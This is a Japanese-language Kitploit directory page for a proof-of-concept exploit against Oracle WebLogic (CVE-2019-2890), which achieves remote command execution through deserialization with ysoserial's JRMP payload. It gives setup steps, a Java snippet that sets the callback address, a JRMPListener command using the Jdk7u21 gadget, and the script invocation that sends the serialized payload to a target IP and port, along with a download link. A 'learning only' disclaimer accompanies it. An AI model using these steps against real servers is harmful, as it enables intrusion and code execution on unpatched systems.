Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-2890 — CVE-2019-2890を標的としたOracle WebLogic向けのPoCエクスプロイト。ysoserialのJRMPペイロードを使用し、シリアライズされたオブジェクトのデシリアライゼーションを介してリモートコマンド実行を行います。 | Kitploit
ツール/GitHubGitHub/l1nk3rlin/cve-2019-2890
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用コマンド&コントロールリモートアクセスツール
GitHubl1nk3rlin/cve-2019-2890

CVE-2019-2890

CVE-2019-2890を標的としたOracle WebLogic向けのPoCエクスプロイト。ysoserialのJRMPペイロードを使用し、シリアライズされたオブジェクトのデシリアライゼーションを介してリモートコマンド実行を行います。

リポジトリを見る
852246年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

声明

学習・交流目的のみに使用してください。その他の用途による結果は自己責任となります。

説明

関連するjarファイルはすべてプロジェクトにインポート済みで、利用方法はysoのJRMPを採用しています。学習・デバッグの際には利用方法を変更できます。

まず、weblogic配下の SerializedSystemIni.dat ファイルを security フォルダーに配置する必要があります。

次に、ysoを ysoserial.jar にリネームし、lib ディレクトリにインポートする必要があります。

1

次に、weblogic/wsee/jaxws/persistence/PersistentContext.java 内の getObject のIPアドレスとポートを指定します。

root@kitploit:~
        try {
            var3.writeObject(Poc.getObject("127.0.0.1:8000"));
        } catch (Exception e) {
            e.printStackTrace();
        }

最後に、リモートでJRMPリスナーを起動し、7u21を利用してコマンドを実行します。

root@kitploit:~
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"

使用方法:Poc.javaを実行してpoc.serシリアライズファイルを生成し、次のコマンドを使用します。

root@kitploit:~
python weblogic.py ip port poc.ser

1

1

ツールをダウンロード